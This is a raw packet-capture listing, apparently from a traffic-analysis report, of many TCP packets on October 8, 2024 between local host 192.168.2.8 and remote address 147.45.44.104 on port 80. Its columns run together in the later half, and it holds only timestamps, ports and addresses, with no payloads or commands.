Oct 8, 2024 03:23:05.177297115 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.177324057 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.177371979 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177382946 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177419901 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.199841022 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.199877977 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.199934006 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.199944973 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.199947119 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.199975967 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.199984074 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.199989080 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.200006962 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.200017929 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.200021029 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.200097084 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203334093 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203345060 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203361988 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203381062 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203398943 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203408003 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203418970 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203419924 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203438997 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203449965 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203454018 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203484058 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203665972 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203676939 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203694105 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203726053 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203758001 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203768015 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203784943 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203798056 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203823090 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203830004 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203840017 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203855038 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203871012 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203876019 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203888893 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203898907 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203910112 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203944921 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.203972101 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203983068 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.203999996 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204009056 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204018116 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.204029083 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204062939 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.204894066 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204902887 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204921007 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204950094 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.204973936 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.204981089 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.204984903 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205029011 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205040932 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205041885 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.205059052 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205068111 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205080032 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.205111980 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.205495119 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205501080 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205507994 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205527067 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205535889 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.205564976 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.205626011 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205641031 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205657959 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205666065 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.205682039 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.205708027 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.206228018 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206239939 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206258059 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206269026 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206278086 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.206291914 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206294060 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206307888 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.206319094 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.206331015 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207168102 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207175970 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207195044 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207218885 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207250118 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207277060 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207289934 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207309008 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207329035 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207329988 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207345963 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207360029 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207370996 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207381964 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207402945 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207405090 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207412958 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207422972 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207431078 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207469940 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207473993 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.207494020 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.207520962 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208307981 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208337069 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208347082 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208379030 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208398104 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208408117 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208425045 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208435059 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208445072 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208470106 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208558083 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208568096 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208583117 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208594084 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208605051 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208630085 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208657026 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208667994 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208683968 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208699942 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208709002 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208715916 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.208720922 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208739042 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.208775043 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.209042072 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209090948 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209099054 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209116936 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209127903 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.209146023 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.209199905 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209209919 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209228039 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209237099 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.209239006 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.209259033 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.210118055 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.210155964 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210161924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.210170031 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210233927 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210243940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210261106 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210270882 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210273027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.210292101 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210303068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210309029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.210323095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210334063 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210347891 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.210370064 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.210375071 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210386038 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210412979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210421085 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.210428953 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.210793018 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.211054087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211066008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211082935 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211102962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211111069 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.211114883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211134911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211143970 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.211144924 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.211179972 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.214471102 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.264123917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264138937 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264157057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264167070 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264185905 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264194965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264202118 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.264215946 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264225960 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.264245033 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.264261007 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.286740065 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286819935 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286834002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286884069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286892891 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.286895037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286912918 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286921978 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.286967039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.286967039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.290281057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290291071 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290307999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290328026 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.290359974 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.290365934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290375948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290390968 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290411949 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.290430069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.290466070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291310072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291328907 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291337967 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291368961 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291372061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291389942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291407108 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291527987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291538954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291553974 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291563988 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291568995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291574001 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291579962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291606903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291635036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291645050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291661024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291667938 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291671991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291688919 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.291695118 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.291724920 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292226076 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292350054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292359114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292376041 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292383909 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292396069 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292399883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292418957 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292431116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292447090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292458057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292474031 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292484045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292493105 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292514086 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292537928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292547941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292563915 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292572975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292586088 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.292591095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.292608976 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293207884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293242931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293252945 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293278933 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293294907 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293306112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293308020 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293334961 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293359995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293370008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293385029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293397903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294162035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294169903 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294186115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294203043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294203997 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294212103 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294224977 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294230938 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294251919 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294258118 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294274092 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294296026 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295778036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295814037 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295818090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295830965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295881987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295892000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295902967 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295913935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295919895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295931101 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295958042 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.297331095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297343969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297358990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297379017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.297385931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297422886 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.297425985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297476053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297492027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297529936 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298357964 CEST8049706147.45.44.104192.168.2.8
